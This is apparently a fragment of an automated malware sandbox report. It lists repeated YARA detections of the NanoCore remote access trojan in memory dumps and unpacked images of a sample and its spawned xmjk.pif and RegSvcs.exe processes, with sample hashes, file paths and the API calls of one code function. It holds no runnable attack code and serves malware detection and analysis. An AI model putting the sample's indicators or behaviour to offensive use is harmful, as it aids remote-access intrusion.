        Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001F.00000002.440034174.0000000002E81000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: C:\Users\user\31956653\xmjk.pif Code function: 4_2_00436219 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,4_2_00436219
        Source: xmjk.pif.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Section loaded: dxgidebug.dll
        Source: dAkJsQr7A9.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.34d9650.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.34d9650.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.60b0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.60b0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.44cb041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.44cb041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.3f3b041.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.3f3b041.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.3f307ce.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.3f307ce.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.2f177b4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.2f177b4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.60b0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.60b0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.34d9650.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.34d9650.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.57c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.57c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.44c07ce.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.44c07ce.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.60b4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.60b4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
